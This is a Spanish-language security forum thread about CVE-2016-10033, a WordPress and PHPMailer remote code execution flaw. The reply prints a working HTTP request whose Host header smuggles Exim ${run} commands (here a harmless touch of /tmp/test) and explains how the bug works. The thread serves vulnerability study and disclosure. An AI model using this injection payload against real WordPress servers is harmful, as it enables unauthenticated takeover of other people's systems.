elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  CVE-2016-10033 WordPress Core - Unauthenticated Remote Code Execution
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: CVE-2016-10033 WordPress Core - Unauthenticated Remote Code Execution  (Leído 3,753 veces)
MCKSys Argentina
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.524


Diviértete crackeando, que para eso estamos!


Ver Perfil
CVE-2016-10033 WordPress Core - Unauthenticated Remote Code Execution
« en: 4 Mayo 2017, 00:42 am »

Dawid Golunski (@dawid_golunski) explica cómo explotar la última vulnerabilidad que ha encontrado en Wordpress (la vulnerabilidad está en PHPMailer).

Usa técnicas nuevas para la explotación, por lo cual es muy recomendable de leer.

El post: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html

Saludos!
En línea

MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."

sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: CVE-2016-10033 WordPress Core - Ejecucion de codigo
« Respuesta #1 en: 6 Junio 2017, 02:30 am »

El resumen es que si envias esta peticion:
Código:
POST /wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: xenial(tmp1 -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test}}  tmp2)
Content-Type: application/x-www-form-urlencoded
Content-Length: 56


user_login=admin&redirect_to=&wp-submit=Get+New+Password

Ejecutas /usr/bin/touch en /tmp/test, el bug es que el codigo de wordpress usa:
Código
  1. $phpmailer->setFrom( $from_email, $from_name );

Y como es implementado, ese comando se convierte en:
Código
  1. /usr/sbin/sendmail -t -i -fREMITENTE

Donde REMITENTE proviene del valor del valor de la cabecera Host, como nosotros controlamos la cabezera Host, solo debemos poner algo ahi y podemos controlar que escriba cualquier cosa.

La vulnerabilidad despues se convierte en ejecucion de codigo por medio de EXIM MTA http://www.exim.org/ , que es el servidor de correo instalado por default en Debian y Ubuntu.

Este tiene una opcion que se llama "Expansion Testing Mode", o modo de expansión de prueba, que puede ser usado para que EXIM lea y ejecute comandos en un lenguage propietario. Uno de los comandos es run.

Cuando haces:
Código:
${run{/bin/true}{yes}{no}}

Ejecuta /bin/true.. Facil

El motivo por el cual el exploit es mas complicado es porque la cabecera de Host no permite diagonales ni espacios, por lo que Dawid uso diagnoales y espacios en otras variables disponibles en el ambiente de EXIM.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problemas con el exploit CVE-2010-3654 Remote Code Execution Vulnerability
Bugs y Exploits
NINGUNA1212 5 5,094 Último mensaje 3 Noviembre 2010, 19:11 pm
por Ivanchuk
phpMyAdmin 4.8.1 - Remote Code Execution (RCE) CVE 2018-12613
Bugs y Exploits
el-brujo 0 3,479 Último mensaje 26 Diciembre 2021, 10:19 am
por el-brujo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines